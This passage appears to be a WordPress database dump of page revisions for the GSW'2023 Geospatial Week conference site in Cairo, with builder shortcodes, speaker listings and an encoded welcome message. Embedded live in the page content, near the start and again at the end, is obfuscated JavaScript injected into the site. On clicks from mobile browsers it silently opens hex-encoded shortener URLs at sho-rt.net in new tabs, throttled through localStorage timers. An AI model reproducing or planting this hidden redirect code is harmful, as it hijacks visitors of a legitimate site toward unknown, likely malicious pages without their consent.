_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 12:57:09','2022-10-07 12:57:09','',2167,'https://gsw2023.com/?p=2385',0,'revision','',0),
(2386,1,'2022-10-07 12:58:13','2022-10-07 12:58:13','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 BY\" main_heading_color=\"#f27304\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"https://aast.edu/en/\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"https://www.isprs.org/\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 